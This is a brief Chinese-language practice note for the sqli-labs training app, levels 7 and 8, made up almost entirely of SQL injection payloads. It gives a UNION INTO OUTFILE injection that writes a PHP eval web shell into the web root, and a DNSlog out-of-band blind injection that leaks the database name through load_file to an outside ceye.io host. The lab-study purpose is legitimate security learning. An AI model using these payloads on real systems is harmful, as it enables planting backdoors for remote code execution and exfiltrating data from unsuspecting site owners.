less 7 是上传文件
前提是要修改mysql 数据库配置文件my.ini
参数secure_file_priv=''
payload
http://192.168.1.30/sqli-labs-master/Less-7/?id=2')) union select 1,2,3 into outfile? "C:\php\WWW\sqli-labs-master\Less-7\test.txt"--+
写入 一句话木马
http://192.168.1.30/sqli-labs-master/Less-7/?id=2')) union select 1,2,"<?php eval($_POST["cmd"]);?>" into outfile "C:\php\WWW\sqli-labs-master\Less-7\test4.php"--+
less 8 是 布尔盲注直接用sqlmap 跑
在网上找到对注入新的玩法,利用dnslog进行注入
前提也是数据库能读写文件
http://192.168.1.30/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\',(select database()),'.xxxx.ceye.io\abc'))),1,1)--+
按我理解就是发送请求给服务器,数据库调用load_file函数,在本地找不到相关对象,就会访问域名服务器,访问域名服务器,域名服务器就会收到信息。